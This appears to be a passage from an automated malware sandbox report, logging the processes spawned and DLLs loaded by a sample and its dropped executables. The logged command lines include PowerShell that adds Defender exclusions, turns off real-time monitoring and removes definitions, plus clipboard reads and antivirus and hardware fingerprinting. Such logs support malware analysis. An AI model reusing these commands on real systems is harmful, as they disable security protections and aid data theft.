Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Brokercrt\comReviewsession.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Process created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
Source: C:\Brokercrt\comReviewsession.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Vjy8d2EoqK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S l r .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Section loaded: mswsock.dll
